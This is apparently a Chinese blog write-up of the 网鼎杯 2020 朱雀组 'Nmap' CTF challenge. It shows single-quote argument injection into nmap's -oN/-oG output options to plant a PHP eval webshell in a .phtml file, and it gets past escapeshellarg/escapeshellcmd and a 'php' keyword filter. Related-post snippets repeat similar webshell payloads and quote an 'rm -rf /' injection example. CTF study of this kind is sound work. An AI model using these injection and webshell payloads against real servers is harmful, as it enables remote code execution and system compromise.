[网鼎杯 2020 朱雀组]Nmap

最新推荐文章于 2025-01-30 15:36:24 发布
原创 最新推荐文章于 2025-01-30 15:36:24 发布 · 244 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了如何在网鼎杯2020朱雀组的挑战中,使用Nmap的-oN选项构造shell,绕过过滤机制。通过不断尝试,发现可以利用phtml文件后缀执行PHP代码,最终成功执行catflag命令获取信息。

[网鼎杯 2020 朱雀组]Nmap

nmap

在这里插入图片描述
本题的考点是利用nmap的-oN写shell。

nmap -oN xxx.txt

先构造:

' -oN w4ke.txt '

返回了Host maybe down,然后访问一下w4ke.txt
在这里插入图片描述
构造:

' -oN w4ke.php <?php eval($_POST['w4ke']); ?>  '

返回了Hacker...

fuzz了一下,发现了php被过滤,phtml可以用。
于是构造:

'  -oN w4ke.phtml <?=eval($_POST['w4ke']); ?> '

在这里插入图片描述
cat flag 即可

[ 2020 朱雀]Nmap1
alwtj的博客
10-10 1558
知识点:escapeshellarg和escapeshellcmd函数的绕过.nmap使用方法.进入页面是一个NMAP工具的使用页面知识点:Nmap(Network Mapper)是一款功能强大的络扫描工具,它能够帮助用户发现络上的设备、开放的端口以及运行的服务。-sU-T0-T5这里试一下多条命令执行.;被转义了.那么看下页面源代码看看.他这里有提示:那么我们可以通过以下知识点写入webshell,或将flag读入指定文件在读取指定文件内容即可:从文件中读取IP地址列表进行扫描。
[ 2020 朱雀]Nmap(详细解读版)
weixin_73399382的博客
07-27 2184
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
BUUCTF [ 2020 朱雀] Nmap
Senimo
12-09 5484
BUUCTF [ 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
[ 2020 朱雀]Nmap 历程记录
m0_74196038的博客
09-10 559
我一开始的时候只试了flag.php,没有成功,后面就放弃了,忘了试一试flag.txt,但事实就是这道题有更简单的做法,所以说在解题的时候还是要把基础的打点要做好,后面再返工是很难受的。查了一下资料,nmap里面有 一个 -iL 参数,后面可以跟上文件名,表示扫描目标是文件里的所有地址,但是我看了好多师傅的poc,也试了几个都不行,不知道咋回事。扫描自己,发现没啥有用的信息,他这里每扫一个主机会把扫描信息存在一个新的文件里,简单试了一下传的参数,也没发现sql注入。查看源码,给了个提示flag路径。
BUUCTF--[ 2020 朱雀]Nmap
最新发布
2401_88083440的博客
01-30 1161
先来看看escapeshellarg是如何发挥作用的?escapeshellarg(): 防止命令注入攻击(a)当命令中不含单引号时(先不管怎么转化的)比如: test.txt;rm -rf /escapeshellarg 会将其转化为:'test.txt;rm -rf /'这样可能在执行后续的命令ls时格式为: ls 'test.txt;rm -rf /' 从而导致只会列出名为test.txt;rm -rf /的文件,而不会执行 rm -rf /命令,从而防止命令注入攻击。
BUUCTF: [ 2020 朱雀]Nmap
末初 · mochu7
09-21 2369
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
【学习笔记 48】 buu [ 2020 朱雀]Nmap
weixin_43553654的博客
08-11 897
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开站一看发现是一个NMAP站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php,
[ 2020 朱雀]nmap
03-16
nmap是一款络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理络,例如发现新设备、检查络拓扑等。nmap具有强大的扫描功能和灵活的配置选项,是安全工作者必备的工具之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值